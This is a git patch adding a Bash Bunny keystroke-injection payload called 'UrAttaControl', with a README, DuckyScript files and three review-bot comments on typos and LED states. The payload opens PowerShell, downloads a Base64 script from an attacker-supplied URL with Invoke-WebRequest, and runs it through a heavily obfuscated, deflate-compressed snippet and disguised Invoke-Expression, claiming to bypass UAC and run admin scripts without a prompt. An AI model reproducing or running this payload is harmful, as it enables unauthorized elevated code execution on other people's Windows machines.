From 791cc4e1aa2b07814674c2d1d5413c6adf228b93 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Tue, 17 May 2022 16:35:51 -0500 Subject: [PATCH] Add files via upload (#524) --- .../execution/-BB-UrAttaControl/README.md | 104 ++++++++++++++++++ .../-BB-UrAttaControl/UrAttaControl.txt | 30 +++++ .../execution/-BB-UrAttaControl/payload.txt | 21 ++++ 3 files changed, 155 insertions(+) create mode 100644 payloads/library/execution/-BB-UrAttaControl/README.md create mode 100644 payloads/library/execution/-BB-UrAttaControl/UrAttaControl.txt create mode 100644 payloads/library/execution/-BB-UrAttaControl/payload.txt diff --git a/payloads/library/execution/-BB-UrAttaControl/README.md b/payloads/library/execution/-BB-UrAttaControl/README.md new file mode 100644 index 00000000..d78b4fe5 --- /dev/null +++ b/payloads/library/execution/-BB-UrAttaControl/README.md @@ -0,0 +1,104 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# UrAttaControl + +A script used to open an elevated powershell console and execute admin level commands + +## Description + +Completely ran from the execute file. Replace the URL in that file with yours leading to a base64 script + +This script will use IEX to download a base64 script to the $Payload variable + +Using a keystroke injections attack a heavily obfuscated and encoded snippet will download and execute any base64 + +script saved in the $Payload variable + +This payload completely bypasses the UAC and will run any admin level script without a prompt + +You can use this function I wrote to convert your .ps1 sscripts to Base64 + +https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* A keystroke injection based payload will run + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

I am Jakoby

+


+ + + + + + + + + + + + + + + + + + + + Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-UrAttaControl) +

+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/payloads/library/execution/-BB-UrAttaControl/UrAttaControl.txt b/payloads/library/execution/-BB-UrAttaControl/UrAttaControl.txt new file mode 100644 index 00000000..3c4890d4 --- /dev/null +++ b/payloads/library/execution/-BB-UrAttaControl/UrAttaControl.txt @@ -0,0 +1,30 @@ +REM Title: UrAttaControl + +REM Author: I am Jakoby + +REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script. +REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details + +REM Target: Windows 10, 11 + +REM NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable +REM EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad + +REM You can use this function I wrote to convert your .ps1 sscripts to Base64 +REM https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md + +GUI r +DELAY 500 +STRING powershell +ENTER + +DELAY 1000 + +STRING $url = "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT" +SHIFT ENTER +STRING $Payload = (Invoke-WebRequest $url'?dl=1').Content +SHIFT ENTER +STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'') +SHIFT ENTER +STRING exit +ENTER diff --git a/payloads/library/execution/-BB-UrAttaControl/payload.txt b/payloads/library/execution/-BB-UrAttaControl/payload.txt new file mode 100644 index 00000000..9846cf48 --- /dev/null 
+++ b/payloads/library/execution/-BB-UrAttaControl/payload.txt @@ -0,0 +1,21 @@ +REM Title: UrAttaControl + +REM Author: I am Jakoby + +REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script. +REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details + +REM Target: Windows 10, 11 + +LED SETUP + +GET SWITCH_POSITION + +ATTACKMODE HID STORAGE + +LED STAGE1 + +QUACK DELAY 3000 +LED STAGE1 +QUACK ${SWITCH_POSITION}/UrAttaControl.txt +
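Review bot: In README.md the Project Link near the end opens with `[` and closes with `)`, so it is not a valid Markdown link and will render as literal text; write it as `[text](url)` or as a bare URL. The Description also says the payload is "Completely ran from the execute file", but this patch adds no file by that name (only payload.txt and UrAttaControl.txt), so name the file the reader is expected to edit. "sscripts" is a typo for "scripts".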
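Review bot: In UrAttaControl.txt the `STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM(...` line types a deflate-compressed, Base64-encoded blob with randomized casing and pipes the result to an invocation operator assembled from `$VeRBosEPreFEreNcE`, so what actually runs in the elevated console cannot be read from this diff. Neither the REM header nor README.md documents that step beyond calling it a "heavily obfuscated and encoded snippet"; please include the decoded source next to it (in the README or as REM comments) so maintainers and anyone triaging this payload can verify its behaviour. The REM header also has typos: "Reaplce" and "sscripts".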
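Review bot: In payload.txt `LED STAGE1` is set twice, once before and once after `QUACK DELAY 3000`, and the script ends right after the `QUACK ${SWITCH_POSITION}/UrAttaControl.txt` line without setting a final LED state, so the device never signals that the run has completed. Drop the duplicate and end with `LED FINISH`. "Reaplce" in the REM header should be "Replace".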